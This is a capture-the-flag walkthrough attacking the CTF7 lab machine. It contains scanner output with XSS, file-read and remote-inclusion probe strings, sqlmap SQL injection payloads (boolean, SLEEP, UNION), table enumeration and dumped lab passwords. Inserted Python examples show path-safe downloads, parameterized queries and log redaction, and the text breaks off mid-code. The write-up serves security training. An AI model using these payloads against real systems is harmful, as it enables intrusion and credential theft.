Nmap done: 1 IP address (1 host up) scanned in 244.13 seconds

HTTP (80/TCP) Enumeration (Scanning)

There are quite a few open services available for us to target on CTF7. For this walkthrough we’ll go ahead and kick off a nikto scan of the web server in the background while we conduct a manual investigation of CTF7’s first web application on 80/TCP.

calvinbebop@Dolos:~$ nikto -h http://10.0.88.9
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.88.9
+ Target Hostname:    10.0.88.9
+ Target Port:        80
+ Start Time:         2018-12-15 16:51:38 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.3.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Cookie roundcube_sessid created without the httponly flag
+ Uncommon header 'x-dns-prefetch-control' found, with contents: off
+ Uncommon header 'union all select filetoclob('/etc/passwd','server')' found, with contents: :html,0 FROM sysusers WHERE username=USER --/.html HTTP/1.1 404 Not Found
+ /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /nosuchurl/><script>alert('Vulnerable')</script>: JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
+ /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /~/<script>alert('Vulnerable')</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /~/<script>alert('Vulnerable')</script>.asp: Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /mailman/listinfo/<script>alert('Vulnerable')</script>: Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-27095: /bb000001.pl<script>alert('Vulnerable')</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-54589: /a.jsp/<script>alert('Vulnerable')</script>: JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert('Vulnerable')</script>.thtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert('Vulnerable')</script>.shtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert('Vulnerable')</script>.jsp: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert('Vulnerable')</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6662: /<script>alert('Vulnerable')</script>: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ Server leaks inodes via ETags, header found with file /webalizer/, inode: 283452, size: 3709, mtime: Mon Dec 24 15:44:07 2012
+ OSVDB-682: /webalizer/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3483: /docs/<script>alert('Vulnerable');</script>: Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0801.
+ OSVDB-6659: /zv6E0CNhAcgWGUnDKkQAvrU16FyigbEUGSGwnEPhaYzCkwhQH0THiZUfa8MumYkwWIergQVEmbfC0qPuf0EprHLgSt8QSZe3uwrbC1t74c6ALf3zh6nQmwAqDqN1F6R5blSGew63m1SG6uHTS3faOGt9detppZ1fHihMtu80pW5vk6hcE9arX6XHyN02TE3VLrflmymKTA5atN9wom6WXoRSsLl7use<font%20size=50>
+ OSVDB-701: /pls/help/<script>alert('Vulnerable')</script>: Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header '-al&absolute_path_studip=http' found, with contents: //cirt.net/rfiinc.txt?? HTTP/1.1 404 Not Found
+ Uncommon header '-al&_phplib[libdir]=http' found, with contents: //cirt.net/rfiinc.txt?? HTTP/1.1 404 Not Found
+ 8346 requests: 0 error(s) and 41 item(s) reported on remote host
+ End Time:           2018-12-15 16:52:07 (GMT-6) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

HTTP (80/TCP) Manual Investigation

Welcome to CTF7’s homepage, the Mad Irish Hacking Academy.

An initial audit of the available HTML source doesn’t turn up much so let’s move on to creating an account in the web application so we can get access to a number of the restricted pages.

Our first available page under Resources is for training registration. We can also see that the application is using an id HTTP parameter to specify requests for the training registration page.

After some manual fandangling with the id parameter and pointing sqlmap at it (with our authenticated cookie), the training registration page’s id parameter does not appear to be injectable.

calvinbebop@Dolos:~$ sqlmap -u "http://10.0.88.9/register&id=2" -p id --cookie="PHPSESSID=407rm89j7cj9js4c3i9ma6s600"
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.2.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:49:53

[17:49:53] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[17:50:11] [INFO] testing connection to the target URL
[17:50:11] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[17:50:11] [INFO] testing if the target URL content is stable
[17:50:12] [INFO] target URL content is stable
[17:50:12] [INFO] testing if URI parameter '#1*' is dynamic
[17:50:12] [WARNING] URI parameter '#1*' does not appear to be dynamic
[17:50:12] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[17:50:12] [INFO] testing for SQL injection on URI parameter '#1*'
[17:50:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:50:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[17:50:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:50:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:50:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:50:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:50:12] [WARNING] reflective value(s) found and filtering out
[17:50:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[17:50:12] [INFO] testing 'MySQL inline queries'
[17:50:12] [INFO] testing 'PostgreSQL inline queries'
[17:50:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:50:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:50:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[17:50:12] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:50:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[17:50:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[17:50:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[17:50:12] [INFO] testing 'Oracle AND time-based blind'
[17:50:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[17:50:13] [WARNING] URI parameter '#1*' does not seem to be injectable
[17:50:13] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[17:50:13] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3 times

[*] shutting down at 17:50:13


Our second available page under Resources is the Reading Room which provides a few different files for download.

Once we select a file to download, we notice that the file HTTP parameter used to specify which file to serve may be susceptible to some form of LFI vulnerability. Let’s try to break it!

Unfortunately, initial testing for an LFI vulnerability doesn’t amount to much, and fimap wasn’t able to locate the presence of a vulnerability either. Let’s keep searching!

calvinbebop@Dolos:~$ fimap -u '10.0.88.9/read&file=0223_cybersecurity_china_us_lieberthal_singer_pdf_english.pdf' --cookie="PHPSESSID=407rm89j7cj9js4c3i9ma6s600"
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: '10.0.88.9/read&file=0223_cybersecurity_china_us_lieberthal_singer_pdf_english.pdf'
[00:12:26] [OUT] Inspecting URL '10.0.88.9/read&file=0223_cybersecurity_china_us_lieberthal_singer_pdf_english.pdf'...
[00:12:26] [INFO] Fiddling around with URL...
[00:12:26] [WARN] unknown url type: 10.0.88.9/read&file=0223_cybersecurity_china_us_lieberthal_singer_pdf_english.pdf
Target URL isn't affected by any file inclusion bug :(
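For the defensive side of the Reading Room test above, here is an added example (mine, not code from the CTF box or from LAMPSecurity) of the kind of resolver a `file` download parameter should sit behind. The document directory, the allowlist and the request strings are constructed for the demo; the technique is the standard allowlist-plus-realpath check that stops traversal (`../`) and absolute paths, which is exactly what the LFI probing was hunting for.

```python
"""Added example (not part of the original write-up): a path-safe download
resolver for a 'file' parameter. Document root and names are constructed."""
import os
import tempfile


class DownloadRejected(ValueError):
    """Raised when a requested name is not one of the published documents."""


def resolve_download(base_dir, allowed_names, requested):
    """Map a user-supplied 'file' value to a path inside base_dir, or raise.

    Two independent checks: the name must be on the allowlist (the role a
    'documents' table plays in a site like this), and the resolved real path
    must still be inside base_dir after symlinks and '..' are applied. The
    second check matters if the allowlist is ever populated from data an
    attacker can influence (e.g. via SQL injection elsewhere in the app).
    """
    if requested not in allowed_names:
        raise DownloadRejected(f"not a published document: {requested!r}")
    base_real = os.path.realpath(base_dir)
    # os.path.join discards base_real when 'requested' is absolute, and
    # realpath collapses any '../' segments, so the prefix test below is
    # made against the path the OS would actually open.
    candidate = os.path.realpath(os.path.join(base_real, requested))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise DownloadRejected(f"escapes document root: {requested!r}")
    return candidate


def demo(requests, extra_allowed=()):
    """Build a throwaway document root, publish one constructed PDF, and
    classify each request as 'ok' or 'rejected'. extra_allowed simulates a
    polluted allowlist to show the path check working on its own."""
    verdicts = {}
    published = {"0223_cybersecurity_china_us_lieberthal_singer_pdf_english.pdf"}
    with tempfile.TemporaryDirectory() as root:
        docs = os.path.join(root, "docs")
        os.mkdir(docs)
        for name in published:
            with open(os.path.join(docs, name), "wb") as fh:
                fh.write(b"%PDF-1.4 constructed placeholder\n")
        allowed = published | set(extra_allowed)
        for req in requests:
            try:
                resolve_download(docs, allowed, req)
                verdicts[req] = "ok"
            except DownloadRejected:
                verdicts[req] = "rejected"
    return verdicts


if __name__ == "__main__":
    for req, verdict in demo(
        ["0223_cybersecurity_china_us_lieberthal_singer_pdf_english.pdf",
         "../../../../etc/passwd", "/etc/passwd"]
    ).items():
        print(f"{verdict:9} {req}")
```

Either check alone would have stopped the probes in this section; keeping both means a later bug in whatever feeds the allowlist does not turn the download endpoint into an arbitrary file read.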


The final available page under Resources is the site’s Newsletter section. Right away we can identify that an id HTTP parameter is being used to specify which post to serve. You know the drill: let’s test for some SQL injection! Adding an apostrophe or semicolon directly after the parameter’s value is often a decent first test for a SQL injection vulnerability. The apostrophe is used because it is the string delimiter in SQL: with it you can terminate a string, thereby testing whether the application correctly escapes the strings it places into its queries.

Peerrrrrfect


SQL Injection Exploitation

After working through some additional manual SQL injection testing, we’re able to verify that a SQL injection vulnerability exists by passing in MySQL’s SLEEP function. In this instance, the function causes the web server to pause for 10 seconds before returning the blog post.
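To make the apostrophe and boolean tests from the two paragraphs above concrete, here is an added example (my own code, not the CTF application’s PHP) that reproduces them against an in-memory SQLite database so it runs offline. The `newsletter` table and its rows are constructed stand-ins; the real target ran MySQL, so the time-based `SLEEP()` check is not reproduced, but the mechanism is the same: whatever follows `id =` in the SQL text is executed as SQL.

```python
"""Added example (not part of the original write-up): the same 'id' lookup
built the vulnerable way and the parameterized way, probed with the inputs
a tester would try first. Schema and rows are constructed."""
import sqlite3


def make_db():
    """Constructed stand-in for the 'newsletter' table seen in the dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE newsletter (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO newsletter VALUES (?, ?)",
        [(1, "Welcome issue"), (2, "Security training dates")],
    )
    return conn


def fetch_vulnerable(conn, raw_id):
    """The defect: the id value is pasted into the SQL text, so any syntax
    in it (quotes, AND, UNION, SLEEP) runs as SQL."""
    sql = "SELECT id, title FROM newsletter WHERE id = " + raw_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # A database error surfacing to the page is the classic first sign
        # that the apostrophe test has landed inside unescaped SQL.
        return "DB ERROR: " + str(exc)


def fetch_parameterized(conn, raw_id):
    """The fix: the value travels as a bound parameter, never as SQL text.
    Hostile input is simply a string that matches no integer id."""
    return conn.execute(
        "SELECT id, title FROM newsletter WHERE id = ?", (raw_id,)
    ).fetchall()


def probe(raw_id):
    """Run one input through both versions; return (vulnerable, parameterized)."""
    conn = make_db()
    return fetch_vulnerable(conn, raw_id), fetch_parameterized(conn, raw_id)


if __name__ == "__main__":
    for test_input in ["1", "1'", "1 AND 1=1", "1 AND 1=2",
                       "-1 UNION ALL SELECT 99,'injected'"]:
        vuln, safe = probe(test_input)
        print(f"{test_input!r:38} vulnerable={vuln!r}  parameterized={safe!r}")
```

The `1 AND 1=1` / `1 AND 1=2` pair is the boolean-based blind test sqlmap reports below, and the `UNION` line is the column-count trick it uses to pull data out in one request; in the parameterized version every one of those inputs just returns an empty result with no error.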

Passing this URL into sqlmap along with our authenticated cookie header, we are able to find three injection points.

calvinbebop@Dolos:~$ sqlmap -u "http://10.0.88.9/newsletter&id=1" -p id --cookie="PHPSESSID=407rm89j7cj9js4c3i9ma6s600"
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:50:46

[17:50:46] [WARNING] you have provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[17:50:48] [INFO] testing connection to the target URL
[17:50:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[17:50:48] [INFO] testing if the target URL content is stable
[17:50:49] [INFO] target URL content is stable
[17:50:49] [INFO] testing if URI parameter '#1*' is dynamic
[17:50:49] [INFO] confirming that URI parameter #1* is dynamic
[17:50:49] [INFO] URI parameter '#1*' is dynamic
[17:50:49] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[17:50:49] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[17:50:49] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:50:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:50:54] [WARNING] reflective value(s) found and filtering out
[17:50:54] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="full")
[17:50:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:50:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:50:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:50:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:50:54] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:50:54] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:50:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:50:54] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[17:50:54] [INFO] testing 'MySQL inline queries'
[17:50:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[17:50:54] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)                                                                                              
[17:50:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:50:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[17:50:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[17:50:54] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[17:50:54] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:50:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[17:51:04] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
[17:51:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:51:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:51:05] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:51:05] [INFO] target URL appears to have 5 columns in query
[17:51:05] [INFO] target URL appears to be UNION injectable with 5 columns
[17:51:05] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 85 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://10.0.88.9:80/newsletter&id=1 AND 8679=8679

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://10.0.88.9:80/newsletter&id=1 AND (SELECT 9273 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(9273=9273,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://10.0.88.9:80/newsletter&id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: http://10.0.88.9:80/newsletter&id=-5625 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6b7671,0x69625367416e5364537873696d484b4a5147437a784c454c6f764a6c4c646e6b4c68484c75454c79,0x716a7a7671),NULL-- xngF
---
[17:51:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[17:51:08] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.88.9'

[*] shutting down at 17:51:08


We’ll now have sqlmap use one of the injection points it previously discovered to enumerate the available databases and their tables.

calvinbebop@Dolos:~$ sqlmap -u "http://10.0.88.9/newsletter&id=1" -p id --cookie="PHPSESSID=407rm89j7cj9js4c3i9ma6s600" --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.7#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:59:20

[18:59:20] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:59:23] [INFO] resuming back-end DBMS 'mysql' 
[18:59:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://10.0.88.9:80/newsletter&id=1 AND 8679=8679

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://10.0.88.9:80/newsletter&id=1 AND (SELECT 9273 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(9273=9273,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://10.0.88.9:80/newsletter&id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: http://10.0.88.9:80/newsletter&id=-5625 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6b7671,0x69625367416e5364537873696d484b4a5147437a784c454c6f764a6c4c646e6b4c68484c75454c79,0x716a7a7671),NULL-- xngF
---
[18:59:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
	...shortened for brevity
Database: website
[9 tables]
+---------------------------------------+
| contact                               |
| documents                             |
| hits                                  |
| log                                   |
| newsletter                            |
| payment                               |
| trainings                             |
| trainings_x_users                     |
| users                                 |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: roundcube
[12 tables]
+---------------------------------------+
| session                               |
| cache                                 |
| cache_index                           |
| cache_messages                        |
| cache_thread                          |
| contactgroupmembers                   |
| contactgroups                         |
| contacts                              |
| dictionary                            |
| identities                            |
| searches                              |
| users                                 |
+---------------------------------------+

Database: mysql
[23 tables]
+---------------------------------------+
| user                                  |
| columns_priv                          |
| db                                    |
| event                                 |
| func                                  |
| general_log                           |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| ndb_binlog_index                      |
| plugin                                |
| proc                                  |
| procs_priv                            |
| servers                               |
| slow_log                              |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
+---------------------------------------+

[18:59:43] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2 times
[18:59:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.88.9'

[*] shutting down at 18:59:43


It looks like sqlmap doesn’t actually have the necessary permissions to access a good number of the tables we previously listed. Fortunately, it was able to retrieve the contents of the log table in the website database:

calvinbebop@Dolos:~$ sqlmap -u "http://10.0.88.9/newsletter&id=1" -p id --cookie="PHPSESSID=407rm89j7cj9js4c3i9ma6s600" --dbms="MySQL" -v 1 --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:21:21

[19:21:21] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[19:21:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://10.0.88.9:80/newsletter&id=1 AND 8679=8679

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://10.0.88.9:80/newsletter&id=1 AND (SELECT 9273 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(9273=9273,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://10.0.88.9:80/newsletter&id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: http://10.0.88.9:80/newsletter&id=-5625 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6b7671,0x69625367416e5364537873696d484b4a5147437a784c454c6f764a6c4c646e6b4c68484c75454c79,0x716a7a7671),NULL-- xngF
---
[19:21:23] [INFO] testing MySQL
[19:21:23] [INFO] confirming MySQL
[19:21:23] [WARNING] reflective value(s) found and filtering out
[19:21:23] [INFO] the back-end DBMS is MySQL

	...shortened for brevity

[19:22:40] [INFO] fetching entries for table 'log' in database 'website'
[19:22:40] [INFO] used SQL query returns 5 entries
[19:22:40] [INFO] retrieved: "1","User test@nowhere.com registered with id 113 and password test"
[19:22:40] [INFO] retrieved: "2","User ruby@localhost.localdomain reset their password to Shelly2012"
[19:22:40] [INFO] retrieved: "3","User ruby@localhost.localdomain logged into the admin site."
[19:22:40] [INFO] retrieved: "4","User charles@localhost.localdomain used recovery.  Their password rest to changeme"
[19:22:40] [INFO] retrieved: "5","User calvinbebop@gmail.com registered with id 114 and password password1"

sqlmap was then able to dump the following user information:

Database: website                                                                                                                                                                                          
Table: log
[5 entries]
+----+------------------------------------------------------------------------------------+
| id | message                                                                            |
+----+------------------------------------------------------------------------------------+
| 1  | User test@nowhere.com registered with id 113 and password test                     |
| 2  | User ruby@localhost.localdomain reset their password to Shelly2012                 |
| 3  | User ruby@localhost.localdomain logged into the admin site.                        |
| 4  | User charles@localhost.localdomain used recovery.  Their password rest to changeme |
| 5  | User calvinbebop@gmail.com registered with id 114 and password password1           |
+----+------------------------------------------------------------------------------------+
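The `log` table is the real finding here: the application writes passwords into its own audit messages. As an added example (not from the write-up), the scanner below runs over those five records, reproduced as constructed input, and both flags and redacts the leaked secret. The regex is an assumption about how this particular application phrases its messages; a real deployment would tune it to its own log format.

```python
"""Added example (not part of the original write-up): detect and redact
plaintext credentials in application log messages. Sample records are
copied from the dumped 'log' table as constructed input."""
import re

# Constructed sample input, reproduced from the dumped 'log' table.
SAMPLE_LOG = [
    (1, "User test@nowhere.com registered with id 113 and password test"),
    (2, "User ruby@localhost.localdomain reset their password to Shelly2012"),
    (3, "User ruby@localhost.localdomain logged into the admin site."),
    (4, "User charles@localhost.localdomain used recovery.  Their password rest to changeme"),
    (5, "User calvinbebop@gmail.com registered with id 114 and password password1"),
]

# Assumed phrasing: 'password <secret>', 'password to <secret>',
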